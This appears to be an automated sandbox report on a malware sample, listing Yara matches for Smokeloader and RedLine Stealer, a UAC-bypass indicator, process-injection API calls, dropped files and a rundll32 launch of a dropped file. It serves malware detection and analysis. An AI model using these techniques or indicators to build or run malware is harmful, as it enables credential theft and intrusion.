Source: Yara match File source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: B87E.exe, 00000005.00000002.464864822.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004C3A08 CryptImportKey, 5_2_004C3A08

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F025 0_2_0040F025
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004170DC 0_2_004170DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004138E8 0_2_004138E8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413E2C 0_2_00413E2C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C635 0_2_0040C635
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414370 0_2_00414370
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_0040F025 4_2_0040F025
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004170DC 4_2_004170DC
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004138E8 4_2_004138E8
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_00413E2C 4_2_00413E2C
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_0040C635 4_2_0040C635
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_00414370 4_2_00414370
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004157C9 4_2_004157C9
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004F75ED 5_2_004F75ED
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004BC1BB 5_2_004BC1BB
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004F1220 5_2_004F1220
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004A7641 5_2_004A7641
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_00506760 5_2_00506760
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004B3784 5_2_004B3784
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004F081F 5_2_004F081F
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004D6A7B 5_2_004D6A7B
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_0049BC94 5_2_0049BC94
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004013D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401407 NtAllocateVirtualMemory, 0_2_00401407
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014DA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014DD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004013E3 NtAllocateVirtualMemory, 0_2_004013E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004013F6 NtAllocateVirtualMemory, 0_2_004013F6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004013FE NtAllocateVirtualMemory, 0_2_004013FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014B3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014BF
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004013D8
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_00401407 NtAllocateVirtualMemory, 4_2_00401407
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004014DA
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004014DD
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004013E3 NtAllocateVirtualMemory, 4_2_004013E3
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004013F6 NtAllocateVirtualMemory, 4_2_004013F6
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004013FE NtAllocateVirtualMemory, 4_2_004013FE
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004014A8
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004014B3
Source: C:\Users\user\AppData\Roaming\gfgsrbs Code function: 4_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004014BF
PE file contains executable resources (Code or Archives)
Source: file.exe Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: B87E.exe.1.dr Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: EBC4.exe.1.dr Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: gfgsrbs.1.dr Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.globalization.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp 3D63AD175A34E4C89EA6ECA4A1161BB5DD514A5E58302707EDC03473EB1F656E
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\gfgsrbs C:\Users\user\AppData\Roaming\gfgsrbs
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B87E.exe C:\Users\user\AppData\Local\Temp\B87E.exe
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EBC4.exe C:\Users\user\AppData\Local\Temp\EBC4.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\EBC4.exe "C:\Users\user\AppData\Local\Temp\EBC4.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B87E.exe C:\Users\user\AppData\Local\Temp\B87E.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EBC4.exe C:\Users\user\AppData\Local\Temp\EBC4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gfgsrbs Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B87E.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@9/5@35/10
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004B8E86 CreateToolhelp32Snapshot, 5_2_004B8E86
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
Source: C:\Users\user\AppData\Local\Temp\EBC4.exe Mutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: EBC4.exe, 00000007.00000002.489007839.0000000000410000.00000040.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000002.507739087.0000000000410000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: C:\cine\zu.pdb source: EBC4.exe, 00000007.00000000.479192618.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000000.488527200.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe.1.dr
Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BC:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb` source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr
Source: Binary string: DC:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Unpacked PE file: 5.2.B87E.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\EBC4.exe Unpacked PE file: 7.2.EBC4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\EBC4.exe Unpacked PE file: 12.2.EBC4.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\gfgsrbs Unpacked PE file: 4.2.gfgsrbs.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\B87E.exe Unpacked PE file: 5.2.B87E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\EBC4.exe Unpacked PE file: 7.2.EBC4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
